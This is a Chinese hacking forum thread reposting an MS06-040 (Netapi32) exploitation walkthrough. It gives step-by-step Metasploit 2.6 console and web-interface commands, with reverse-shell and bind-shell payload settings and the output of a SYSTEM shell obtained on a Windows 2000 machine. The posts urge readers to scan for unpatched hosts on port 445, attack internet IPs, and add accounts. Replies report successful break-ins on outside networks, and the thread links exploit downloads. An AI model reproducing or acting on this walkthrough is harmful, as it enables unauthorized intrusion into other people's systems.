[转载]MS06040漏洞利用动画
动画作者:stuhack原始连接:[url]http://bbs.stuhack.com[/url]
MS06040漏洞利用动画
攻击目标:
192.1.80.2 (内网虚拟机)
所用工具:
MS06-040 Netapi32 Scanner [url]http://vip.stuhack.com/soft/MS06-040Scanner.rar[/url]
Metasploit V2.6 [url]http://vip.stuhack.com/soft/ActivePerl.msi[/url]
Perl解释器 : [url]http://vip.stuhack.com/soft/framework.exe[/url]
下载下来先升级,运行安装目录下的 msfupdate.bat 文件
运行 msfconsole.bat , 这是控制台程序,升级.这里我已经升级完毕.
运行msfconsole.bat
__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|
+ -- --=[ msfconsole v2.6 [153 exploits - 76 payloads]
msf > show exploits // //显示溢出利用程序,里面有153个溢出程序
msf > use netapi_ms06_040 //使用netapi_ms06_040 利用程序
msf netapi_ms06_040 > show payloads //显示可用的shellcode例表
msf netapi_ms06_040 > set PAYLOAD win32_reverse // //设置 PAYLOAD 为 win32_reverse
PAYLOAD -> win32_reverse
msf netapi_ms06_040(win32_reverse) > set RHOST 192.1.80.2 //设置被攻击的主机的IP
RHOST -> 192.1.80.2
msf netapi_ms06_040(win32_reverse) > set LHOST 192.1.80.152 // //设置本机的IP
LHOST -> 192.1.80.152
msf netapi_ms06_040(win32_reverse) > set TARGET 0
TARGET -> 0
msf netapi_ms06_040(win32_reverse) > set
LHOST: 192.1.80.152
PAYLOAD: win32_reverse
RHOST: 192.1.80.2
TARGET: 0
msf netapi_ms06_040(win32_reverse) > exploit 开始溢出
# Starting Reverse Handler.
# Detected a Windows 2000 target
# Sending request...
# Got connection from 192.1.80.152:4321 <-> 192.1.80.2:1039
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32> 这东西俺用mika MM的那个程序也做了一个简单的动画
[url]http://forum.eviloctal.com/read-htm-tid-24215-page-2-fpage-1.html[/url]
在这里. MS06-040漏洞演示动画
1:首先安装Metasploit Framework,建议安装2.6版!
2:把从网上下载的PM格式或者把发布的exploit代码保存为PM格式放到C:\Program Files\Metasploit Framework\home\framework\exploits目录下.
我已经把exploit放到目录下了,所以不重复了
3:你可以在"MSFConsole"界面下使用这个exploit或者运行"MSFWeb"后直接打开[url]http://127.0.0.1:55555[/url]后使用这个exploit.
4:MSFConsole下的使用方法比较麻烦,推荐在WEB模式下使用!
5:演示一下在MSFConsole的使用方法.
info exploit netapi_ms06_040是查看这个exploit的相关信息
use netapi_ms06_040是使用这个exploit
show targets是查看Target模式,选择默认的就可以了
set PAYLOAD win32_bind是使用bind的方式获得SHELL,关于更多命令及使用方法,请大家自己去百度一下
show options是查看使用这个exploit及PAYLOAD后需要设置的一些参数
set RHOST xxx.xxx.xxx.xxx这个是设置你的攻击目标 用我之前扫出来的几个IP试试!
SMBDOM,SMBUSER,SMBPASS可以不用设置 并不是像网上传的那样,要密码和账号才能成功!
关于PAYLOAD的参数,都可以使用默认的
用set命令查看我们设置好的参数
最后使用exploit命令攻击目标
成功后会直接获得一个系统权限shell!
现在已经成功!这是我之前添加的账号!
6:演示一下在WEB界面下如何使用Metasploit Framework来攻击目标.
首先运行"MSFWeb"快捷方式,提示显示完后用浏览器打开[url]http://127.0.0.1:55555/[/url]
找到MS06_040的exploit,选择他后,再选择一个Target模式,选择0就可以了
然后选择PAYLOAD,还是选win32_bind,win32_reverse是反弹一个SHELL回来,但是我测试这种模式的时候把目标主机搞死机了,所以没用这个PAYLOAD,大家可以试试,也许那是特殊现象.
选择好后,直接在RHOST里填入攻击目标的IP
点击Exploit就开始攻击了!
单击session x 后会在新页面打开一个网页式的SHELL,同样是系统权限
演示完了,关于如何寻找存在漏洞的主机这就要靠大家自己去发挥了,可以先扫描开了445端口的,然后用getos.exe筛选出WIN2000的主机,这个exploit成功的前提就是445端口开放+Win2000 or WinXP sp1+未打补丁的.
欢迎大家光临ExpCode.com这里会每天发布最新的exploits,保证比milw0rm速度快,数量多,呵呵!
Metasploit Framework下载地址:
[url]http://www.expcode.com/download/framework-2.6.exe[/url]
MS06-040 Exploit:
/remote/2006/0815/1742.html
****************
ExpCode.com Over
****************
下载地址为:
[url]http://www.expcode.com/download/ms06040demo.zip[/url]
解压密码:ExpCode.com
这个好像是最早的040溢出动画演示了,拿的是外网做的例子,楼主利用的工具溢出外网貌似成功率不高,还不如用mika修改版版的EXP,fhod兄好像也是拿的内网做的实验。 [quote][b]这里是引用第[/b][color=#ff0000][1 楼][/color][b]的[color=#000066]fhod[/color]于[/b]2006-08-20 12:18[b]发表的:[/b]
这东西俺用mika MM的那个程序也做了一个简单的动画
[url]http://forum.eviloctal.com/read-htm-tid-24215-page-2-fpage-1.html[/url]
在这里.[/quote]
fhod,把你那个动画独立单发出来吧。::))在那么多帖子中挺难找的。 楼上的建议不错哈
俺这就发出来
俺用mika的那个在外网中也溢出成功一个
对2000的系统成功率很高的说.
页:
[1]